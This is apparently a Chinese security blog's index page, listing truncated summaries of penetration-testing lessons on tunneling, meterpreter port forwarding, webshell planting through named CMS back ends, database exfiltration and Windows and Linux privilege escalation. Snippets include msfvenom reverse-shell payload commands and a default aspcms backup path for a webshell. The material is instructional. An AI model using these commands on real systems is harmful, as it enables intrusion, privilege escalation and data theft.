第四节 跨路由扫描(通过给攻击机增加路由)
摘要:1. 前置工作 拿到meterpreter 2. 查看路由信息 获取网卡信息 ifconfig 路由信息(获取在线网段) run get_local_subnets 3. 增加路由 run autoroute -s ip/子网掩码 或者用最新的模块: run post/multi/manage/au
阅读全文
posted @
2021-08-25 13:57
EndlessShw
阅读(113)
推荐(0) 编辑
第三节 隧道技术之socket隧道
摘要:1. 下载代理工具 http://sourceforge.net/projects/ssocks/ 2. 安装 下载成功后,将该工具放到攻击机和肉鸡里面进行安装,放在tmp文件夹下面。 tar zxvf ssocks-0.0.14.tar.gz cd ssocks-0.0.14 编译文件:./con
阅读全文
posted @
2021-08-24 18:10
EndlessShw
阅读(276)
推荐(0) 编辑
第二节 端口转发与端口映射
摘要:1. 前置工作 通过反弹tcp拿到meterpreter。porfwd工具的使用在meterpreter中 2. 端口映射 portfwd add -L 攻击机ip -l 攻击机端口 -p 内网待渗透/开放端口 -r 内网待渗透ip 3. 端口转发,例如转发3389 portfwd add -l 攻
阅读全文
posted @
2021-08-24 16:47
EndlessShw
阅读(192)
推荐(0) 编辑
第一节 隧道技术ssh
摘要:1. ssh隧道的简介和一些常用命令解释 ssh 用于登录远程主机, 并且在远程主机上执行命令. 它的目的是替换 rlogin 和 rsh, 同时在不安全的网络之上, 两个互不 信任的主机之间, 提供加密的, 安全的通信连接. X11 连接和任意 TCP/IP 端口均可以通过此安全通道转发(forw
阅读全文
posted @
2021-08-24 16:07
EndlessShw
阅读(145)
推荐(0) 编辑
第一节 数据库脱出的一些常用方法
摘要:1. 直接打包数据库 通过菜刀,将数据库备份文件复制到别的文件夹下然后改名成rar文件,接着浏览器访问下载。用菜刀直接下载也行,但是遇到大的文件的时候下载较慢而且可能出错。 a. access mdb格式直接下载 b. MySQL 在路径mysql/data/ c. mssql msdbdata.m
阅读全文
posted @
2021-08-21 17:08
EndlessShw
阅读(240)
推荐(0) 编辑
第二节 aspcms后台、xycms后台、南方数据后台、无忧企业后台拿webshell
摘要:插入asp文件拿webshell 新建文件 拿webshell 上传文件拿wenshell 编辑html 拿webshell 备份数据库拿webshell 1. aspcms后台 aspcms默认的数据库备份路径为data/#5Dp8Gh.asp,所以路径为http://www.aspcms.com
阅读全文
posted @
2021-08-20 17:59
EndlessShw
阅读(770)
推荐(0) 编辑
第一节 dedecms后台、帝国cms后台、phpcms后台拿webshell
摘要:1. dedecms方法 文件上传(分为图片上传或者文件管理器上传) 文件包含漏洞,在模块管理中将一句话插入到html的文件中(优先为文件主页) 也可以在核心设置中插入一句话,从而将一句话插入到data\config.cache.inc.php中。 2. 帝国cms方法(mpirecms) 该cms
阅读全文
posted @
2021-08-19 13:41
EndlessShw
阅读(193)
推荐(0) 编辑
第十七节 msf结合漏洞审计工具进行提权
摘要:1. Windows补丁审计工具 在终端下可以使用命令systeminfo查看系统的信息(尤其是漏洞补丁信息)。 Windows补丁检测Windows-Exploit-Suggester: https://github.com/GDSSecurity/Windows-Exploit-Suggeste
阅读全文
posted @
2021-08-18 18:32
EndlessShw
阅读(153)
推荐(0) 编辑
第十六节 Metasploit Linux提权
摘要:1. 获得反弹shell 区别于Windows,Linux因为exe不是可执行文件,所以要换其他的方法。 生成反弹shell的php: msfvenom -p php/meterpreter_reverse_tcp LHOST=本地IP LPORT=12345 -f raw > /var/www/h
阅读全文
posted @
2021-08-16 18:02
EndlessShw
阅读(772)
推荐(0) 编辑
第十五节 meteasploit windows提权
摘要:1. 常见的提取板块 metasploit提权EXP存储文件夹路径: usr/share/metasploit-framework/modules/exploits/windows/local#windows:windows/local Windows常见的提权模块: ms14_058 内核模式驱动
阅读全文
posted @
2021-08-16 17:18
EndlessShw
阅读(82)
推荐(0) 编辑
第十四节 FileZilla提权
摘要:1. 简介 FileZilla是一个ftp服务器,假如配置不严的,就可以读取xml文件内容(包含用户的信息和管理信息)执行一些简单的命令。 默认的安装目录:C:\Program Files\FileZilla Server\ 包含敏感信息的两个文件为:FileZilla Server.xml和Fil
阅读全文
posted @
2021-08-16 13:06
EndlessShw
阅读(188)
推荐(0) 编辑
第十三节 zend反弹shell提权
摘要:1. 漏洞利用过程 msfconsole生成反弹shell: msfvenom -p windows/meterpreter/reverse_tcp lhost=kali的ip port=端口 -f exe > /var/www/html/shell.exe 在其中一个dos框中进行监听: use
阅读全文
posted @
2021-08-14 16:58
EndlessShw
阅读(62)
推荐(0) 编辑
第十二节 zend提权
摘要:1. 简介 在php里面有一个扩展是zend,这个是用解析php zend脚本加密文件。 如果服务器安装了zend,如果ZendExtensionManager.dll 权限可以修改,那就可以用其他dll替换这dll文件。即如果php装了Zend插件 就要查看这个目录的ZendExtensionMa
阅读全文
posted @
2021-08-13 18:36
EndlessShw
阅读(86)
推荐(0) 编辑
第十一节 mof提取(一般用来留后门
摘要:1. mof 托管对象格式 (MOF) 文件是创建和注册提供程序、事件类别和事件的简便方法。在 MOF 文件中创建类实例和类定义后,可以对该文件进行编译。编译 MOF 文件将在 CIM 储存库中注册所有的类定义和实例。之后,提供程序、事件类别和事件信息便可由 便可由 WMI 和 Visual Stu
阅读全文
posted @
2021-08-13 17:57
EndlessShw
阅读(272)
推荐(0) 编辑
第十节 lpk劫持提权
摘要:1. 简介 lpk劫持发生在Windows2003或者xp中。如果同一个目录中存在exe和lpk.dll。每当exe执行的时候就会被劫持。利用这个特性可以把lpk提权的文件放到权限较高的程序,当exe运行时,lpk.dl就可以进行提权。 2. 提权工具 Tools Lpk Sethc v4 这个工具
阅读全文
posted @
2021-08-13 14:03
EndlessShw
阅读(397)
推荐(0) 编辑
第九节 winserver2008 r2 溢出提权
摘要:1. 简介 在winserver2008 r2中,服务器默认是支持aspx的。所以默认都是可以执行一些命令。如果没有进行补丁修复可以利用一些溢出提权工具进行提权。 2. CVE-2014-4113-Exploit 利用该提取工具对winserver2008进行溢出提权。 3. 利用过程 通过aspx
阅读全文
posted @
2021-08-13 12:43
EndlessShw
阅读(352)
推荐(0) 编辑
第八节 SQL server提权
摘要:1. 简介 如果网站里面使用的数据库是SQL server,那么如果找到sa的密码,利用提权脚本来执行命令,但是不一定是系统权限,还要看管理员开始安装SQL server时给予其的权限设置 2. 查找账号和密码 一般会存放账号密码的地方: web.config config.asp conn.asp
阅读全文
posted @
2021-08-11 18:18
EndlessShw
阅读(159)
推荐(0) 编辑
第七节 Windows溢出提权(aspx)
摘要:1. 简介 aspx程序比asp的权限高,默认是可以执行cmd命令。如果asp不能执行命令且服务器支持aspx上传,那么我们可以上传aspx程序到网站上进行提权。 2. 进行提权 首先上传aspx马(密码为admin)。 因为aspx马可以执行命令,所以这里直接上传提权工具即可
阅读全文
posted @
2021-08-11 13:41
EndlessShw
阅读(124)
推荐(0) 编辑
第六节 Windows溢出提权(asp)
摘要:1. 简介 Windows服务器中,常用的一般是win2003,win2008,win2012 在渗透测试中 ,我们获取的权限是iis_user用户组 ,要更高的权限就需要把当前的用户提权到系统用户或超级管理员用户组。更高的权限方便我们在后续的渗透中,扩大范围测试。 2. 程序权限的对比 在iis里
阅读全文
posted @
2021-08-11 13:10
EndlessShw
阅读(167)
推荐(0) 编辑
第五节 Linux Cron Jobs 提权
摘要:1. 原理和利用 Cron Jobs 计划任务。通过/etc/crontab文件,可以设定系统定期执行的任务。但crontab文件只能是root权限进行编辑。当我们以普通权限远程登录用户的时候,查看/etc/crontab文件内容,如果存在就可以尝试利用。 Crontab 语法: * * * * *
阅读全文
posted @
2021-08-10 15:42
EndlessShw
阅读(318)
推荐(0) 编辑
第四节 MySQL UDF 提权
摘要:1. 定义 在MySQL中可以使用自定义函数进行提权,udf为user defined function 即用户自定义函数。 对于用户自定义的函数,在MySQL5.1版本以后就需要放在插件目录/lib/plugin中(默认不存在),文件后缀为dill,c语言编写。 [提权]mysql中的UDF提权
阅读全文
posted @
2021-08-09 17:16
EndlessShw
阅读(61)
推荐(0) 编辑
第三节 GNU C library 动态链接区 $ORIGIN 溢出提权(
摘要:1. 名词解释 The GNU C Library: The GNU C Library project provides the core libraries for the GNU system and GNU/Linux systems, as well as many other syste
阅读全文
posted @
2021-08-09 13:27
EndlessShw
阅读(188)
推荐(0) 编辑
第二节 Linux SUID提权
摘要:1. 定义 SUID是一种特殊的文件属性,它允许用户执行的文件以该文件的拥有者的身份运行。 SUID是一种对二进制程序进行设置的特殊权限,可以让二进制程序的执行者临时拥有属主的权限(仅对拥有执行权限的二进制程序有效)。例如,所有用户都可以执行passwd命令来修改自己的用户密码,而用户密码保存在/e
阅读全文
posted @
2021-08-07 18:01
EndlessShw
阅读(131)
推荐(0) 编辑
第一节 Linux内核提权
摘要:1. 提权的定义 通常我们在拥有一个webshell的时候,一般权限都是WEB容器权限,如在iis就是iis用户组权限,在apache 就是apache权限,一般都是权限较低,均可执行一些普通命令,如查看当前用户,网络信息,ip信息等。如果我想进行内网渗透就必须将权限提权到最高,如系统权限 超级管理
阅读全文
posted @
2021-08-07 13:32
EndlessShw
阅读(218)
推荐(0) 编辑
第十三节 json劫持漏洞与利用
摘要:1. 定义 JSON是一种轻量级的数据交换格式,而劫持就是对数据进行窃取(或者应该称为打劫、拦截比较合适。恶意攻击者通过某些特定的手段,将本应该返回给用户的JSON数据进行拦截,转而将数据发送回给恶意攻击者,这就是JSON劫持的大概含义。一般来说进行劫持的JSON数据都是包含敏感信息或者有价值的数据
阅读全文
posted @
2021-08-06 11:48
EndlessShw
阅读(970)
推荐(0) 编辑
第十二节 密码找回漏洞利用
摘要:1. 定义 为了防止用户遗忘密码,大多数网站都提供了找回密码功能。常见的找回密码方式有:邮箱找回密码、根据密码保护问题找回密码、根据手机号码找回密码等。虽然这些方式都可以找回密码,但实现方式各不相同。无论是哪种密码找回方式,在找回密码时,除了自己的用户密码,如果还能找回其他用户的密码,就存在密码找回
阅读全文
posted @
2021-08-05 17:28
EndlessShw
阅读(151)
推荐(0) 编辑
第十一节 伪随机码漏洞的利用
摘要:1. 定义 伪随机码 结构可以预先确定,重复产生和复制,具有某种随机序列的随机特性的序列号。 在WEB开发中 伪随机码主要用于确定范围 例如6位数的范围是 000000-999999 这个范围内 随机生成一个值。在php里就有这样的函数 rand()函数是产生随机数的一个随机函数 例如生成00000
阅读全文
posted @
2021-08-05 16:11
EndlessShw
阅读(212)
推荐(0) 编辑
第十节 越权漏洞和身份绕过cookie和session
摘要:1. 越权漏洞的定义 越权漏洞是一种很常见的逻辑安全漏洞。可以这样理解:服务器端对客户提出的数据操作请求过分信任,忽略了对该用户操作权限的判定,导致攻击账号拥有了其他账户的增删改查功能。 2.越权漏洞的分类 平行越权: 就是相同级别(权限)的用户或者同一角色不同的用户之间,可以越权访问、修改或者删除
阅读全文
posted @
2021-08-05 13:14
EndlessShw
阅读(2540)
推荐(0) 编辑
第八节 ssrf服务器端请求伪造
摘要:1. 定义 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) SSRF
阅读全文
posted @
2021-08-03 17:49
EndlessShw
阅读(127)
推荐(0) 编辑
第七节 CSRF跨站请求伪造
摘要:1. 定义 CSRF定义: 跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF , 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。 简单地说,是攻击
阅读全文
posted @
2021-08-03 15:21
EndlessShw
阅读(35)
推荐(0) 编辑
第六节 命令执行漏洞
摘要:1. 定义 在部分WEB应用里,应用程序会提供一些命令执行操作,如没有过滤好用户输入的数据,就有可能产生命令执行漏洞 从而执行有危害系统命令。 2. 漏洞类型 a. 代码审计方面的命令执行 一般涉及的函数如下: ${}执行代码 eval assert preg_replace create_func
阅读全文
posted @
2021-08-03 11:30
EndlessShw
阅读(93)
推荐(0) 编辑
第四节 文件包含截断
摘要:1. 00截断 使用条件: php版本 < 5.3.4 且需要magic_quotes_gpc=off 漏洞利用: 当使用文件包含时结尾自动加上后缀,此时就可以使用%00截断后面自动加上的后缀。 2. 超长文件截断 漏洞原理: 加上垃圾数据来达到最大数据数,从而将后面自带的后缀给挤掉 使用条件: p
阅读全文
posted @
2021-08-01 20:17
EndlessShw
阅读(369)
推荐(0) 编辑
第四节 详细查询、备份、恢复(MySQL数据库学习
摘要:1. 条件符号 = <> < > >= <= is null is not null and or like 列名 between 小 and 大 等价于 <=,>= 列名 in (值1, 值2, 值3...) 等价于 or和= 2. 排序 order by 列名 asc(升序) | desc(降序
阅读全文
posted @
2021-08-01 16:51
EndlessShw
阅读(45)
推荐(0) 编辑
第三节 对数据的操作(MySQL数据库学习
摘要:1. 插入内容 insert into 表名(字段名称1, 字段名称2, ......) values(值1, 值2 ......); 如果我们添加全部字段的数据,那么我们可以省略这个前面的字段名:insert into 表名 values(值1, 值2,......); 2. 修改(更新)数据 u
阅读全文
posted @
2021-08-01 11:16
EndlessShw
阅读(60)
推荐(0) 编辑
